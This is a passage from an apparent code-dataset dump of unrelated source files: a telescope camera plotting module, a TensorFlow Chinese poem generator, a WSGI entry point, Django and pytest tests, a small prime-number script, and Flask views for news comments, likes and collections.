y_title,\n \"x_pos\": x_pos,\n \"y_pos\": y_pos,\n \"rotate_angle\": (3 / 2.0) * np.pi,\n \"fc\": \"red\",\n \"ec\": \"red\",\n \"invert_yaxis\": invert_yaxis,\n }\n self._plot_one_axis_def(plot, **kwargs)\n\n @staticmethod\n def _plot_one_axis_def(plot, **kwargs):\n \"\"\"\n Plot an axis on the pyplot.plt instance provided.\n\n Parameters\n ----------\n plot: pyplot.plt instance\n A pyplot.plt instance where to add the axes definitions.\n **kwargs: dict\n x_title: str\n x-axis title\n y_title: str\n y-axis title,\n x_pos: float\n x position of the axis to draw\n y_pos: float\n y position of the axis to draw\n rotate_angle: float\n rotation angle of the axis in radians\n fc: str\n face colour of the axis\n ec: str\n edge colour of the axis\n invert_yaxis: bool\n Flag to invert the y-axis (for dual mirror telescopes).\n \"\"\"\n\n x_title = kwargs[\"x_title\"]\n y_title = kwargs[\"y_title\"]\n x_pos, y_pos = (kwargs[\"x_pos\"], kwargs[\"y_pos\"])\n\n r = 0.1 # size of arrow\n sign = 1.0\n if kwargs[\"invert_yaxis\"]:\n sign *= -1.0\n x_text1 = x_pos + sign * r * np.cos(kwargs[\"rotate_angle\"])\n y_text1 = y_pos + r * np.sin(0 + kwargs[\"rotate_angle\"])\n x_text2 = x_pos + sign * r * np.cos(np.pi / 2.0 + kwargs[\"rotate_angle\"])\n y_text2 = y_pos + r * np.sin(np.pi / 2.0 + kwargs[\"rotate_angle\"])\n\n plot.gca().annotate(\n x_title,\n xy=(x_pos, y_pos),\n xytext=(x_text1, y_text1),\n xycoords=\"axes fraction\",\n ha=\"center\",\n va=\"center\",\n size=\"xx-large\",\n arrowprops=dict(\n arrowstyle=\"<|-\", shrinkA=0, shrinkB=0, fc=kwargs[\"fc\"], ec=kwargs[\"ec\"]\n ),\n )\n\n plot.gca().annotate(\n y_title,\n xy=(x_pos, y_pos),\n xytext=(x_text2, y_text2),\n xycoords=\"axes fraction\",\n ha=\"center\",\n va=\"center\",\n size=\"xx-large\",\n arrowprops=dict(\n arrowstyle=\"<|-\", shrinkA=0, shrinkB=0, fc=kwargs[\"fc\"], ec=kwargs[\"ec\"]\n ),\n )\n\n def plot_pixel_layout(self, camera_in_sky_coor=False, pixels_id_to_print=50):\n \"\"\"\n Plot the pixel layout for an observer facing the camera. 
Including in the plot edge pixels,\\\n off pixels, pixel ID for the first 50 pixels, coordinate systems, FOV, focal length and the\\\n average edge radius.\n\n Returns\n -------\n fig: plt.figure instance\n Figure with the pixel layout.\n \"\"\"\n\n self._logger.info(f\"Plotting the {self._telescope_model_name} camera\")\n\n fig, ax = plt.subplots()\n plt.gcf().set_size_inches(8, 8)\n\n if not is_two_mirror_telescope(self._telescope_model_name):\n if not camera_in_sky_coor:\n self._pixels[\"y\"] = [(-1) * y_val for y_val in self._pixels[\"y\"]]\n\n on_pixels, edge_pixels, off_pixels = list(), list(), list()\n\n for i_pix, xy_pix_pos in enumerate(zip(self._pixels[\"x\"], self._pixels[\"y\"])):\n if self._pixels[\"pixel_shape\"] == 1 or self._pixels[\"pixel_shape\"] == 3:\n hexagon = mpatches.RegularPolygon(\n (xy_pix_pos[0], xy_pix_pos[1]),\n numVertices=6,\n radius=self._pixels[\"pixel_diameter\"] / np.sqrt(3),\n orientation=np.deg2rad(self._pixels[\"orientation\"]),\n )\n if self._pixels[\"pix_on\"][i_pix]:\n if len(self.get_neighbour_pixels()[i_pix]) < 6:\n edge_pixels.append(hexagon)\n else:\n on_pixels.append(hexagon)\n else:\n off_pixels.append(hexagon)\n elif self._pixels[\"pixel_shape\"] == 2:\n square = mpatches.Rectangle(\n (\n xy_pix_pos[0] - self._pixels[\"pixel_diameter\"] / 2.0,\n xy_pix_pos[1] - self._pixels[\"pixel_diameter\"] / 2.0,\n ),\n width=self._pixels[\"pixel_diameter\"],\n height=self._pixels[\"pixel_diameter\"],\n )\n if self._pixels[\"pix_on\"][i_pix]:\n if len(self.get_neighbour_pixels()[i_pix]) < 4:\n edge_pixels.append(square)\n else:\n on_pixels.append(square)\n else:\n off_pixels.append(square)\n\n if self._pixels[\"pix_id\"][i_pix] < pixels_id_to_print + 1:\n font_size = 4\n if get_telescope_class(self._telescope_model_name) == \"SCT\":\n font_size = 2\n plt.text(\n xy_pix_pos[0],\n xy_pix_pos[1],\n self._pixels[\"pix_id\"][i_pix],\n horizontalalignment=\"center\",\n verticalalignment=\"center\",\n fontsize=font_size,\n )\n\n ax.add_collection(\n PatchCollection(on_pixels, facecolor=\"none\", edgecolor=\"black\", linewidth=0.2)\n )\n ax.add_collection(\n PatchCollection(\n edge_pixels,\n facecolor=mcolors.to_rgb(\"brown\") + (0.5,),\n edgecolor=mcolors.to_rgb(\"black\") + (1,),\n linewidth=0.2,\n )\n )\n ax.add_collection(\n PatchCollection(off_pixels, facecolor=\"black\", edgecolor=\"black\", linewidth=0.2)\n )\n\n legend_objects = [leg_h.PixelObject(), leg_h.EdgePixelObject()]\n legend_labels = [\"Pixel\", \"Edge pixel\"]\n if isinstance(on_pixels[0], mlp.patches.RegularPolygon):\n legend_handler_map = {\n leg_h.PixelObject: leg_h.HexPixelHandler(),\n leg_h.EdgePixelObject: leg_h.HexEdgePixelHandler(),\n leg_h.OffPixelObject: leg_h.HexOffPixelHandler(),\n }\n elif isinstance(on_pixels[0], mlp.patches.Rectangle):\n legend_handler_map = {\n leg_h.PixelObject: leg_h.SquarePixelHandler(),\n leg_h.EdgePixelObject: leg_h.SquareEdgePixelHandler(),\n leg_h.OffPixelObject: leg_h.SquareOffPixelHandler(),\n }\n\n if len(off_pixels) > 0:\n legend_objects.append(leg_h.OffPixelObject())\n legend_labels.append(\"Disabled pixel\")\n\n plt.axis(\"equal\")\n plt.grid(True)\n ax.set_axisbelow(True)\n plt.axis(\n [\n min(self._pixels[\"x\"]),\n max(self._pixels[\"x\"]),\n min(self._pixels[\"y\"]) * 1.42,\n max(self._pixels[\"y\"]) * 1.42,\n ]\n )\n plt.xlabel(\"Horizontal scale [cm]\", fontsize=18, labelpad=0)\n plt.ylabel(\"Vertical scale [cm]\", fontsize=18, labelpad=0)\n ax.set_title(\n f\"Pixels layout in {self._telescope_model_name:s} camera\",\n fontsize=15,\n y=1.02,\n 
)\n plt.tick_params(axis=\"both\", which=\"major\", labelsize=15)\n\n self._plot_axes_def(plt, self._pixels[\"rotate_angle\"])\n description = \"For an observer facing the camera\"\n if camera_in_sky_coor and not is_two_mirror_telescope(self._telescope_model_name):\n description = \"For an observer behind the camera looking through\"\n if is_two_mirror_telescope(self._telescope_model_name):\n description = \"For an observer looking from secondary to camera\"\n ax.text(\n 0.02,\n 0.02,\n description,\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n\n fov, r_edge_avg = self.calc_fov()\n ax.text(\n 0.02,\n 0.96,\n r\"$f_{\\mathrm{eff}}$ = \" + f\"{self._focal_length:.3f} cm\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n ax.text(\n 0.02,\n 0.92,\n f\"Avg. edge radius = {r_edge_avg:.3f} cm\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n ax.text(\n 0.02,\n 0.88,\n f\"FoV = {fov:.3f} deg\",\n transform=ax.transAxes,\n color=\"black\",\n fontsize=12,\n )\n\n plt.legend(\n legend_objects,\n legend_labels,\n handler_map=legend_handler_map,\n prop={\"size\": 11},\n loc=\"upper right\",\n )\n\n ax.set_aspect(\"equal\", \"datalim\")\n plt.tight_layout()\n\n return fig\n","sub_path":"simtools/model/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":30640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"82830920","text":"# -*- coding: utf-8 -*-\n# file: main.py\n# author: JinTian\n# time: 11/03/2017 9:53 AM\n# Copyright 2017 JinTian. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------\nimport tensorflow as tf\nfrom apps.tensorflow_poems.poems.model import rnn_model\nfrom apps.tensorflow_poems.poems.poems import process_poems\nimport numpy as np\nfrom pypinyin import pinyin, Style\n\nclass Poem(object):\n def __init__(self, s_word):\n self.begin_word = s_word\n self.start_token = 'B'\n self.end_token = 'E'\n self.model_dir = './apps/tensorflow_poems/model/'\n self.corpus_file = './apps/tensorflow_poems/data/poems.txt'\n self.lr = 0.0002\n self.RATE = 0.008\n self.max_len = 78\n self.poems_vector, self.word_int_map, self.vocabs = process_poems(self.corpus_file)\n self.input_data = tf.placeholder(tf.int32, [1, None])\n self.end_points = rnn_model(model='lstm', input_data=self.input_data, output_data=None, vocab_size=len(\n self.vocabs), rnn_size=128, num_layers=2, batch_size=64, learning_rate=self.lr)\n self._parse_input()\n\n def _parse_input(self):\n self.input_word_len = len(self.begin_word)\n #for i in range(self.input_word_len):\n # print(self.begin_word[i])\n\n def _rate_for_tone(self, tdst, tsrc):\n tsrc1 = tsrc[:-1]\n tsrc2 = tsrc[-1:]\n tdst1 = tdst[:-1]\n tdst2 = tdst[-1:]\n add_rate = 0\n if (tsrc1 not in tdst1) and (tdst1 not in tsrc1):\n return 0\n if len(tsrc1) == 1:\n if len(tdst1) == 1:\n add_rate += self.RATE\n if (tsrc2 in tdst2):\n add_rate += self.RATE\n else:\n 
if len(tdst1) != 1:\n if len(tdst1) == len(tsrc1):\n add_rate += self.RATE\n if (tsrc2 in tdst2):\n add_rate += self.RATE\n return add_rate\n\n def _predict_with_tone(self, predict, tone):\n new_predict = predict\n if tone:\n for i in range(len(self.vocabs)):\n pword = pinyin(self.vocabs[i],style=Style.FINALS_TONE3)[0][0]\n #print(\"%s %s %s, We need %s %s\"%(self.vocabs[i], pword1, pword2, tone1, tone2))\n new_predict[i] += self._rate_for_tone(pword, tone)\n\n return new_predict/np.sum(new_predict)\n def __is_word_define(self, idx):\n if idx < self.input_word_len:\n if self.is_chinese(self.begin_word[idx]):\n return self.begin_word[idx]\n return 0\n\n def to_word_auto(self, idx, predict, tone=None):\n ret = self.__is_word_define(idx)\n if ret:\n return ret\n pdata = np.copy(predict[0])\n #print(predict)\n #print(np.sum(predict))\n #print(len(predict))\n pdata = self._predict_with_tone(pdata, tone)\n #tmp = predict.tolist()\n #pdata /= np.sum(pdata)\n sample = np.random.choice(np.arange(len(pdata)), p=pdata)\n #sample = tmp.index(max(tmp))\n #print(sample)\n if sample > len(self.vocabs):\n return self.vocabs[-1]\n else:\n return self.vocabs[sample]\n\n def to_word_manual(self, idx, predict, tone=None):\n ret = self.__is_word_define(idx)\n if ret:\n return ret\n pdata = np.copy(predict[0])\n #print(predict)\n #print(np.sum(predict))\n #print(len(predict))\n pdata = self._predict_with_tone(pdata, tone)\n most_predict = sorted(pdata)\n most_predict.reverse()\n like_words = \"\"\n valid_idlist = []\n for i in range(10):\n idx = np.where(pdata == most_predict[i])\n idx = list(idx[0])\n if len(idx):\n for i in idx:\n like_words += self._get_word(i)+\"[%d] \"%i\n valid_idlist.append(i)\n print(\"Here is the most likely words:\")\n print(\"%s\"%like_words)\n want_char = input('Please select what you what use number:')\n #tmp = predict.tolist()\n #pdata /= np.sum(pdata)\n if want_char.isdigit():\n want_char = int(want_char)\n if want_char in valid_idlist:\n return self._get_word(want_char)\n elif self.is_chinese(want_char):\n return want_char\n return self._get_word(np.random.choice(np.arange(len(pdata)), p=pdata))\n\n def is_chinese(self, word):\n if word >= u'\\u4e00' and word <= u'\\u9fff':\n return 1\n return 0\n\n def _get_word(self, idx):\n if idx > len(self.vocabs):\n return self.vocabs[-1]\n else:\n return self.vocabs[idx]\n\n\n def gen_poem(self, word_select):\n batch_size = 1\n print('## loading corpus from %s' % self.model_dir)\n\n to_word = word_select\n saver = tf.train.Saver(tf.global_variables())\n init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n with tf.Session() as sess:\n sess.run(init_op)\n\n checkpoint = tf.train.latest_checkpoint(self.model_dir)\n saver.restore(sess, checkpoint)\n\n x = np.array([list(map(self.word_int_map.get, self.start_token))])\n\n [predict, last_state] = sess.run([self.end_points['prediction'], self.end_points['last_state']],\n feed_dict={self.input_data: x})\n word = to_word(0, predict)\n #word = self.begin_word or predict_word\n #print(\"begin_word: %s predict_word: %s select_word: %s\"%(self.begin_word, pword, word))\n poem_ = ''\n\n i = 0\n #print(last_state)\n #for i, (c, h) in enumerate(last_state):\n # print(last_state[i].c)\n # print(last_state[i].h)\n single_len = self.max_len\n tone = None\n plist = []\n while word != self.end_token:\n poem_ += word\n i += 1\n if i > self.max_len:\n break\n x = np.array([[self.word_int_map[word]]])\n [predict, last_state] = sess.run([self.end_points['prediction'], 
self.end_points['last_state']],\n feed_dict={self.input_data: x, self.end_points['initial_state']: last_state})\n add_tone = tone if (i+2)%single_len == 0 else None\n word = to_word(i, predict, add_tone)\n #print(\"idx[%d, %d], %s %s %s\"%(i, single_len, word, pinyin(word,style=Style.FINALS_TONE3)[0][0], add_tone))\n plist.append(word)\n #print(single_len)\n if (word in ',') and single_len == self.max_len:\n single_len = i+1\n tone = pinyin(plist[i-2],style=Style.FINALS_TONE3)[0][0]\n #print(tone)\n\n return poem_\n\n\n#start_token = 'B'\n#end_token = 'E'\n#model_dir = './model/'\n#corpus_file = './data/poems.txt'\n#\n#lr = 0.0002\n#RATE = 0.008\n#def rate_for_tone(tdst, tsrc):\n# tsrc1 = tsrc[:-1]\n# tsrc2 = tsrc[-1:]\n# tdst1 = tdst[:-1]\n# tdst2 = tdst[-1:]\n# add_rate = 0\n# if (tsrc1 not in tdst1) and (tdst1 not in tsrc1):\n# return 0\n# if len(tsrc1) == 1:\n# if len(tdst1) == 1:\n# add_rate += RATE\n# if (tsrc2 in tdst2):\n# add_rate += RATE\n# else:\n# if len(tdst1) != 1:\n# if len(tdst1) == len(tsrc1):\n# add_rate += RATE\n# if (tsrc2 in tdst2):\n# add_rate += RATE\n# return add_rate\n#\n#def predict_with_tone(predict, vocabs, tone):\n# new_predict = predict\n# if tone:\n# for i in range(len(vocabs)):\n# pword = pinyin(vocabs[i],style=Style.FINALS_TONE3)[0][0]\n# #print(\"%s %s %s, We need %s %s\"%(vocabs[i], pword1, pword2, tone1, tone2))\n# new_predict[i] += rate_for_tone(pword, tone)\n#\n# return new_predict/np.sum(new_predict)\n#\n#def to_word(predict, vocabs, tone=None):\n# pdata = np.copy(predict[0])\n# #print(predict)\n# #print(np.sum(predict))\n# #print(len(predict))\n# pdata = predict_with_tone(pdata, vocabs, tone)\n# #tmp = predict.tolist()\n# #pdata /= np.sum(pdata)\n# sample = np.random.choice(np.arange(len(pdata)), p=pdata)\n# #sample = tmp.index(max(tmp))\n# #print(sample)\n# if sample > len(vocabs):\n# return vocabs[-1]\n# else:\n# return vocabs[sample]\n#\n#\n#def gen_poem(begin_word):\n# batch_size = 1\n# print('## loading corpus from %s' % model_dir)\n# poems_vector, word_int_map, vocabularies = process_poems(corpus_file)\n# #print(poems_vector)\n# #print(word_int_map)\n# input_data = tf.placeholder(tf.int32, [batch_size, None])\n#\n# end_points = rnn_model(model='lstm', input_data=input_data, output_data=None, vocab_size=len(\n# vocabularies), rnn_size=128, num_layers=2, batch_size=64, learning_rate=lr)\n#\n# saver = tf.train.Saver(tf.global_variables())\n# init_op = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n# with tf.Session() as sess:\n# sess.run(init_op)\n#\n# checkpoint = tf.train.latest_checkpoint(model_dir)\n# saver.restore(sess, checkpoint)\n#\n# x = np.array([list(map(word_int_map.get, start_token))])\n#\n# [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],\n# feed_dict={input_data: x})\n# word = begin_word or to_word(predict, vocabularies)\n# poem_ = ''\n#\n# i = 0\n# #print(last_state)\n# #for i, (c, h) in enumerate(last_state):\n# # print(last_state[i].c)\n# # print(last_state[i].h)\n# max_len = 78\n# single_len = max_len\n# tone = None\n# plist = []\n# while word != end_token:\n# poem_ += word\n# i += 1\n# if i > max_len:\n# break\n# x = np.array([[word_int_map[word]]])\n# [predict, last_state] = sess.run([end_points['prediction'], end_points['last_state']],\n# feed_dict={input_data: x, end_points['initial_state']: last_state})\n# add_tone = tone if (i+2)%single_len == 0 else None\n# word = to_word(predict, vocabularies, add_tone)\n# print(\"idx[%d, %d], %s %s %s\"%(i, 
single_len, word, pinyin(word,style=Style.FINALS_TONE3)[0][0], add_tone))\n#            plist.append(word)\n#            #print(single_len)\n#            if (word in ',') and single_len == max_len:\n#                single_len = i+1\n#                tone = pinyin(plist[i-2],style=Style.FINALS_TONE3)[0][0]\n#                #print(tone)\n#        return poem_\n#\n#\n#def pretty_print_poem(poem_):\n#    print(poem_)\n#    print(len(poem_))\n#    poem_sentences = poem_.split('。')\n#    for s in poem_sentences:\n#        if s != '' and len(s) > 10:\n#            print(s + '。')\n\nif __name__ == '__main__':\n    begin_char = input('## please input the first character:')\n    # the module-level gen_poem()/pretty_print_poem() above are commented out,\n    # so use the Poem class, which provides the same functionality\n    composer = Poem(begin_char)\n    poem = composer.gen_poem(composer.to_word_auto)\n    print(poem)\n","sub_path":"apps/tensorflow_poems/compose_poem.py","file_name":"compose_poem.py","file_ext":"py","file_size_in_byte":11725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"521444660","text":"from webob import Request, Response\nimport sys\nimport os\nimport inspect\n\n# make modules pluggable\nentry_point_path = os.path.split(inspect.getfile(inspect.currentframe()))[0]\ncur_folder = os.path.realpath(os.path.abspath(entry_point_path))\nif cur_folder not in sys.path:\n    sys.path.insert(0, cur_folder)\n\n# create configuration object\nfrom conf import Config\nconf = Config()\n\n# include syspath module\nfrom core import syspath\nsyspath = syspath.init_syspath(cur_folder,conf.sitesdir)\n\n\ndef main_index(environ, start_response):\n    if environ['mod_wsgi.process_group'] != '':\n        import signal, os\n        os.kill(os.getpid(), signal.SIGINT)\n    req = Request(environ)\n    import core.urltool\n    site = core.urltool.SiteURLParser(req)\n    cursite = site.getCurSite()\n    static_dirs = core.urltool.getStaticDirs(cursite)\n    spath = False\n    filename = req.path_info.split('/')[-1]\n    for s_path in static_dirs:\n        if(req.path_info.startswith(s_path) and s_path+filename==req.path_info):\n            spath = s_path\n            break\n    if('ajax' in req.POST.keys()):\n        func = req.POST['run']\n        # run a function from ajax class of current page\n        #fid = open(syspath.BASE_PATH+syspath.DS+\"log.txt\", \"a\")\n        #print('ajax', file=fid)\n        ajax = __import__(syspath.SITES_DIR+'.'+cursite+'.'+cursite+'_ajax',fromlist=[func])\n        ajaxFunc = getattr(ajax,func)\n        ans = ajaxFunc(req)\n        res = Response(ans)\n        return res(environ, start_response)\n    elif(spath):\n        # static files share\n        static = core.urltool.StaticURLParser(spath,filename)\n        return static(environ, start_response)\n    else:\n        # site\n        from core.htmltool import AddonHelper\n        addon = AddonHelper()\n        addon.includeSiteAddons(cursite,req)\n        return site(environ, start_response)\n\napplication = main_index\n","sub_path":"index.wsgi","file_name":"index.wsgi","file_ext":"wsgi","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
{"seq_id":"123212465","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\n\nfrom blog.models import Post\n\n# Create your tests here.\nclass BlogTests(TestCase):\n    \n    def setUp(self):\n        self.user = get_user_model().objects.create_user(\n            username='testuser',\n            email = 'test@email.com', \n            password = 'secret'\n        )\n\n        self.post = Post.objects.create(\n            title='A good title',\n            body='Nice body content',\n            author=self.user\n        )\n    \n    def test_string_representation(self):\n        self.assertEqual(str(self.post), f'{self.post.title}')\n\n    def test_post_content(self):\n        self.assertEqual(f'{self.post.title}', 'A good title')\n        self.assertEqual(f'{self.post.author}', 'testuser')\n        
self.assertEqual(f'{self.post.body}', 'Nice body content') \n\n def test_post_list_view(self):\n res = self.client.get(reverse('home'))\n self.assertEqual(res.status_code, 200)\n self.assertTemplateUsed(res, 'home.html')\n\n def test_post_detail_view(self):\n res = self.client.get('/post/1/')\n self.assertEqual(res.status_code, 200)\n self.assertTemplateUsed(res, 'post_detail.html')","sub_path":"blog/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"58630576","text":"import pytest\n\nfrom command.extract_dist import to_list\n\n\nclass TestExtractDistribution(object):\n\n @pytest.mark.parametrize(('var', 'expected'), [\n (['pkg'], ['pkg']),\n (None, []),\n ('pkg >= 2.5\\npkg2', ['pkg >= 2.5', 'pkg2']),\n (('pkg'), ['pkg']),\n (('pkg',), ['pkg']),\n ((p for p in ('pkg',)), ['pkg']),\n ])\n def test_list(self, var, expected):\n assert to_list(var) == expected\n","sub_path":"tests/test_extract_distribution.py","file_name":"test_extract_distribution.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111738511","text":"def pierwsza(liczba):\r\n pomoc=liczba // 2\r\n b = 0\r\n l = 2\r\n while l <= pomoc:\r\n reszta = liczba % l\r\n if reszta == 0:\r\n return False\r\n l = l + 1\r\n return True\r\n \r\n\r\nczyt = 2\r\nlicznik = 0\r\nwhile czyt < 100000:\r\n if \"777\" in str(czyt):\r\n if pierwsza(czyt):\r\n print(czyt)\r\n licznik=licznik + 1\r\n czyt = czyt + 1\r\nprint(\"Liczb szczesliwych jest\", licznik) \r\n \r\n\r\n\r\n","sub_path":"Python/L3/prog3l3.py","file_name":"prog3l3.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"151458461","text":"import logging\n\nfrom flask import abort, jsonify\nfrom flask import g\nfrom flask import render_template\nfrom flask import request\nfrom flask import session\n\nfrom info import constants, db\nfrom info.models import News, User, Comment, CommentLike\nfrom info.utils.common import user_login_info\nfrom info.utils.response_code import RET\nfrom . 
import news_blu\n\n@news_blu.route('/comment_like',methods=[\"post\"])\n@user_login_info\ndef comment_like():\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n comment_id=request.json.get(\"comment_id\")\n action=request.json.get(\"action\")\n if not all([comment_id,action]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n if action not in [\"add\",\"remove\"]:\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n comment_id=int(comment_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n comment=Comment.query.get(comment_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n if not comment:\n return jsonify(errno=RET.NODATA,errmsg=\"要点赞的评论不存在\")\n comment_like_model=CommentLike.query.filter(CommentLike.comment_id==comment_id,CommentLike.user_id==user.id).first()\n if action==\"add\":\n if not comment_like_model:\n comment_like_model=CommentLike()\n comment_like_model.comment_id=comment_id\n comment_like_model.user_id=user.id\n db.session.add(comment_like_model)\n comment.like_count+=1\n else:\n if comment_like_model:\n db.session.delete(comment_like_model)\n comment.like_count-=1\n try:\n db.session.commit()\n except Exception as e:\n logging.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR,errmsg=\"数据库操作失败\")\n return jsonify(errno=RET.OK,errmsg=\"OK\")\n\n@news_blu.route(\"/news_comment\",methods=[\"post\"])\n@user_login_info\ndef news_comment():\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n #接收参数 news_id comment parent_id\n news_id = request.json.get(\"news_id\")\n print(news_id)\n comment_content = request.json.get(\"comment\")\n parent_id = request.json.get(\"parent_id\")\n print(comment_content)\n # 校验参数\n if not all([news_id,comment_content]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n try:\n news_id=int(news_id)\n if parent_id:\n parent_id=int(parent_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n # 查询新闻是否存在\n news=None\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n\n if not news:\n return jsonify(errno=RET.NODATA,errmsg=\"查询的新闻不存在\")\n\n #初始化评论模型并添加到数据库\n comment=Comment()\n comment.user_id=user.id\n comment.news_id=news_id\n comment.content=comment_content\n comment.parent_id=parent_id if parent_id else None\n\n try:\n db.session.add(comment)\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n logging.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"保存评论数据失败\")\n return jsonify(errno=RET.OK, errmsg=\"OK\",data=comment.to_dict())\n\n\n@news_blu.route('/news_collect',methods=[\"post\"])\n@user_login_info\ndef news_collect():\n# # 1.接受参数\n#\n# user = g.user\n# if not user:\n# return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\")\n#\n# news_id=request.json.get(\"news_id\")\n#\n# action=request.json.get(\"action\")\n# # 2.判断参数\n# if not all([news_id,action]):\n# return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n# if action not in [\"collect\", \"cancel_collect\"]:\n# return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n# # 3.查询新闻,并判断新闻是否存在\n# try:\n# news=News.query.get(news_id)\n# except Exception as e:\n# logging.error(e)\n# return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n# if not news:\n# return jsonify(errno=RET.NODATA,errmsg=\"未查询到新闻数据\")\n#\n# if action==\"cancel_collect\":\n# if 
news in user.collection_news:\n# user.collection_news.remove(news)\n# else:\n# if news not in user.collection_news:\n# user.collection_news.append(news)\n# return jsonify(errno=RET.OK,errmsg=\"OK\")\n#\n #点击收藏按钮时��首先判断用户是否登录\n user=g.user\n if not user:\n return jsonify(errno=RET.SESSIONERR,errmsg=\"用户未登录\") #前端这里应该弹出登录框\n\n #1.接收参数:news_id 和 action\n news_id=request.json.get(\"news_id\")\n action=request.json.get(\"action\")\n #2. 校验参数\n if not all([news_id,action]):\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n if action not in [\"collect\",\"cancel_collect\"]:\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数错误\")\n try:\n news_id=int(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.PARAMERR,errmsg=\"参数错误\")\n\n #3. 先查询该新闻是否存在,然后根据请求的动作去收藏或取消收藏新闻\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n if not news:\n return jsonify(errno=RET.NODATA,errmsg=\"查询的新闻不存在\")\n\n if action==\"collect\":\n if news not in user.collection_news:\n user.collection_news.append(news)\n else:\n if news in user.collection_news:\n user.collection_news.remove(news)\n #最后返回响应的数据\n return jsonify(errno=RET.OK,errmsg=\"OK\")\n\n@news_blu.route('/')\n@user_login_info\ndef detail(news_id):\n # 查询用户是否登录\n user=g.user\n\n # 查询右侧新闻排行列表\n news_list = list()\n try:\n news_list = News.query.order_by(News.clicks.desc()).limit(constants.CLICK_RANK_MAX_NEWS)\n except Exception as e:\n logging.error(e)\n news_dict_li = list()\n for news in news_list if news_list else []:\n news_dict_li.append(news.to_basic_dict())\n\n #查询具体新闻数据\n news=None\n try:\n news=News.query.get(news_id)\n except Exception as e:\n logging.error(e)\n\n if not news:\n abort(404)\n\n # 更新新闻点击次数\n news.clicks+=1\n # 判断是否收藏该新闻,默认值为 false\n is_collected = False\n # collection_news 后面可以不用加all,因为sqlalchemy会在使用的时候去自动加载\n if user:\n if news in user.collection_news:\n is_collected = True\n\n # 查询并显示评论(评论显示是否点赞)\n #1.查询该新闻的所有评论\n #2.查询当前登录用户点赞的该新闻下的评论id\n #3.给评论添加is_like 属性,默认为Fasle,被点赞的评论is_like=True\n comments=[]\n try:\n\n comments=Comment.query.filter(Comment.news_id==news_id).order_by(Comment.create_time.desc()).all()\n except Exception as e:\n logging.error(e)\n return jsonify(errno=RET.DBERR,errmsg=\"数据查询错误\")\n\n\n comment_ids=[]\n comments_like_ids=[]\n try:\n # 1.查询该新闻的所有评论的id\n comment_ids=[comment.id for comment in comments]\n print(comment_ids)\n # 2.查询当前登录用户点赞的该新闻下的评论\n comments_like=CommentLike.query.filter(CommentLike.comment_id.in_(comment_ids),CommentLike.user_id==user.id).all()\n\n #3.取到被点赞评论的id\n comments_like_ids=[comment_like.comment_id for comment_like in comments_like]\n print(comments_like_ids)\n except Exception as e:\n print(e)\n logging.error(e)\n\n\n comments_dict_li=[]\n for comment in comments:\n comment_dict=comment.to_dict()\n comment_dict[\"is_like\"]=False\n if comment.id in comments_like_ids:\n comment_dict[\"is_like\"]=True\n comments_dict_li.append(comment_dict)\n\n data={\n \"user\": user.to_dict() if user else None,\n \"news_list\": news_dict_li,\n \"news\":news.to_dict(),\n \"is_collected\":is_collected,\n \"comments_dict_li\":comments_dict_li\n }\n return render_template(\"news/detail.html\",data=data)","sub_path":"info/modules/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300470735","text":"from __future__ import print_function\nimport numpy as np\nimport 